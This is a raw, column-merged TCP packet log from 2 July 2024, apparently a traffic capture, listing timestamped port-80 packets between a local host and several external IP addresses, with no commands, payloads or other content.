                                            Jul 2, 2024 08:26:36.086970091 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086983919 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086993933 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087016106 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087043047 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087055922 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087074041 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087097883 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087097883 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087119102 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087230921 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087244034 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087255955 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087268114 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087285995 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087285995 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087305069 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087332010 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087346077 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087357998 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087374926 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087400913 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087400913 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087418079 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087492943 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087506056 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087521076 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087537050 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087546110 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087546110 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087568045 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087568045 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087606907 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087620020 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087650061 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087661982 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087714911 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087728024 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087739944 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087754011 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087757111 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087771893 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087774992 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087785006 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087796926 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087811947 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.087841988 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087853909 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.087909937 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:38.702286005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:38.702378988 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:40.476463079 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:40.477895975 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:43.572009087 CEST6389380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:43.576816082 CEST806389377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:43.576900959 CEST6389380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:43.578114033 CEST6389380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:43.582972050 CEST806389377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:44.314119101 CEST806389377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:44.314203978 CEST6389380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:44.315187931 CEST6389380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:44.323337078 CEST806389377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:44.549247026 CEST806389377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:44.550554991 CEST6389380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:44.591093063 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:44.596163034 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:44.596266985 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:44.606792927 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:44.611654043 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.304533958 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.304558992 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.304572105 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.304610014 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.304641962 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.304677963 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.304692030 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.304704905 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.304716110 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.304723978 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.304729939 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.304760933 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.304790020 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.304883003 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.304896116 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.304939032 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.309398890 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.309431076 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.309461117 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.309503078 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.309607983 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.309736967 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.412936926 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.412955999 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.413007021 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.413012981 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.413041115 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.413048029 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.413201094 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.413213015 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.413223982 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.413235903 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.413252115 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.413273096 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.413665056 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.413676977 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.413717985 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.413739920 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.413811922 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.413830042 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.413878918 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.414205074 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.414221048 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.414258003 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.414269924 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.414343119 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.414499044 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.414506912 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.414519072 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.414544106 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.414577007 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.415179014 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.415193081 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.415231943 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.415299892 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.415453911 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.415465117 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.415515900 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.416094065 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.416147947 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.416248083 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.416316032 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.418453932 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.418572903 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.418625116 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.418732882 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.418745041 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.418776989 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.418808937 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.682954073 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.682981968 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.682995081 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683006048 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683016062 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683021069 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.683024883 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683036089 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683047056 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.683049917 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683104038 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.683228970 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683238983 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683248997 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683253050 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683264971 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683274984 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683284998 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683285952 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.683295965 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683311939 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.683329105 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.683696032 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683707952 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683717966 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683728933 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683737993 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683748960 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683754921 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.683758974 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683769941 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683779955 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683788061 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.683789968 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683799982 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683808088 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.683810949 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.683819056 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.683852911 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.684362888 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684371948 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684385061 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684396029 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684405088 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684406996 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.684417009 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684429884 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.684429884 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684439898 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684451103 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684461117 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684465885 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.684472084 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684485912 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684490919 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.684498072 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684499979 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.684508085 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684518099 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684528112 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684530020 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.684537888 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684547901 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.684560061 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.684570074 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.684587955 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.685266972 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.685278893 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.685288906 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.685298920 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.685324907 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.685357094 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.687864065 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.687913895 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.687954903 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.687973022 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.687984943 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.687994957 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.688016891 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.688026905 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.688069105 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.688114882 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.688116074 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.688127041 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.688162088 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.688179970 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.688410997 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.688452959 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.688471079 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.688489914 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.688510895 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.688538074 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.688538074 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.688549042 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.688585997 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.688849926 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.688859940 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.688869953 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.688890934 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.688925982 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.689083099 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.689127922 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.689135075 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.689138889 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.689168930 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.689184904 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.689244032 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.689254999 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.689264059 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.689275026 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.689290047 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.689316988 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.689415932 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.689426899 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.689436913 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.689448118 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.689464092 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.689502001 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.690010071 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690045118 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690057039 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690099955 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.690152884 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690164089 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690174103 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690200090 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.690222025 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.690323114 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690329075 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690331936 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690335035 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690342903 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690402031 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.690892935 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690917015 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690928936 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.690942049 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.690957069 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.691050053 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691061974 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691071987 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691082001 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691099882 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.691128969 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.691200972 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691212893 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691224098 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691232920 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691246033 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.691272974 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.691807032 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691862106 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.691864014 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691875935 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691916943 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.691956043 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691967010 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691977978 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.691987991 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.692008018 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.692020893 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.692101955 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.692112923 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.692123890 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.692130089 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.692151070 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.692173004 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.692773104 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.692823887 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.692903042 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.692924023 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.692934990 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.692945004 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.692949057 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.692967892 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.692967892 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.692977905 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.692989111 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.692996979 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.693028927 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.693335056 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.693377972 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.693383932 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.693429947 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.739944935 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.739963055 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.739975929 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740009069 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.740036964 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.740037918 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740048885 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740058899 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740082979 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.740103006 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.740204096 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740216017 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740255117 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.740339041 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740350008 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740359068 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740389109 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.740417957 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.740423918 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740468979 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.740750074 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740811110 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740822077 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:45.740832090 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.740845919 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:45.740868092 CEST6389480192.168.2.477.91.77.81
